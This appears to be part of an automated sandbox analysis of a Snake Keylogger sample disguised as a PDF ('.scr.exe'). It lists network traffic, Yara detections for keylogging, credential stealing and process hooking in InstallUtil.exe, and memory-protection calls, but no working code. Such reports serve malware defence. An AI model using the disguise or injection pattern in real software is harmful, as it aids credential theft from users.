                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49990 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3c919b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3c919b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3c919b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe PID: 2924, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: InstallUtil.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: InstallUtil.exe PID: 5148, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E4A50 NtProtectVirtualMemory,0_2_068E4A50
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E80E8 NtResumeThread,0_2_068E80E8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E4A48 NtProtectVirtualMemory,0_2_068E4A48
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E80E6 NtResumeThread,0_2_068E80E6
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_00D731900_2_00D73190
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_00D731820_2_00D73182
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_00D7370A0_2_00D7370A
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_064981490_2_06498149
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_06499AB30_2_06499AB3
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_06495BA80_2_06495BA8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_064923390_2_06492339
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0649E0150_2_0649E015
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0649E0380_2_0649E038
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_06495B980_2_06495B98
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0650F4980_2_0650F498
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065004980_2_06500498
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0650187F0_2_0650187F
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065080210_2_06508021
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065018900_2_06501890
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065004890_2_06500489
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0650795A0_2_0650795A
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065079680_2_06507968
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C6C500_2_065C6C50
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C1DA80_2_065C1DA8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C6BF00_2_065C6BF0
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C8EB00_2_065C8EB0
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C8EA00_2_065C8EA0
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C4F270_2_065C4F27
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C6C410_2_065C6C41
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C15400_2_065C1540
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C15320_2_065C1532
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C00400_2_065C0040
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C00060_2_065C0006
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065C21E50_2_065C21E5
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A73280_2_066A7328
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066ADA200_2_066ADA20
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A99E80_2_066A99E8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066AA6C00_2_066AA6C0
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066AA6D00_2_066AA6D0
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A731A0_2_066A731A
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A00400_2_066A0040
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A00060_2_066A0006
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066AF01A0_2_066AF01A
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066ADD470_2_066ADD47
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A9A9E0_2_066A9A9E
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A19020_2_066A1902
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_06758CC60_2_06758CC6
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_06751A000_2_06751A00
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_067519F00_2_067519F0
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0676F5B80_2_0676F5B8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0676F5630_2_0676F563
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0676F5A70_2_0676F5A7
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0676A0F80_2_0676A0F8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E12F80_2_068E12F8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E12E80_2_068E12E8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E37FF0_2_068E37FF
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E38100_2_068E3810
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E59380_2_068E5938
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_069BFA600_2_069BFA60
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_069A00060_2_069A0006
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_069A00400_2_069A0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8C1A03_2_00B8C1A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B861203_2_00B86120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8B3383_2_00B8B338
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8C4803_2_00B8C480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8E4413_2_00B8E441
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B846D93_2_00B846D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8F7883_2_00B8F788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8B7E23_2_00B8B7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8C7623_2_00B8C762
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B867483_2_00B86748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B898683_2_00B89868
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8CA423_2_00B8CA42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8BEBF3_2_00B8BEBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B835723_2_00B83572
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8D7F03_2_00B8D7F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B8D8003_2_00B8D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614A6B03_2_0614A6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061474B03_2_061474B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614AD003_2_0614AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06140D483_2_06140D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06148D803_2_06148D80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614D5BE3_2_0614D5BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06147A1E3_2_06147A1E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06149A183_2_06149A18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614B3503_2_0614B350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061493D03_2_061493D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614A0603_2_0614A060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614B9A03_2_0614B9A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614A6A23_2_0614A6A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06143EF83_2_06143EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06143F083_2_06143F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061467983_2_06146798
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061467A83_2_061467A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061447D03_2_061447D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061447E03_2_061447E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06146C003_2_06146C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06144C383_2_06144C38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06144C2B3_2_06144C2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614D45A3_2_0614D45A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061404983_2_06140498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061404883_2_06140488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061424A03_2_061424A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061474A03_2_061474A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061454D83_2_061454D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614ACF03_2_0614ACF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061454E83_2_061454E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06148D763_2_06148D76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06145DB03_2_06145DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06145DC03_2_06145DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06149A073_2_06149A07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06147AF83_2_06147AF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061463503_2_06146350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061463403_2_06146340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614B3403_2_0614B340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614437B3_2_0614437B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061443883_2_06144388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061493C03_2_061493C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06146BF13_2_06146BF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061400063_2_06140006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614A0563_2_0614A056
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061470583_2_06147058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061400403_2_06140040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061470483_2_06147048
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061450903_2_06145090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061450813_2_06145081
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061408F03_2_061408F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061408E13_2_061408E1
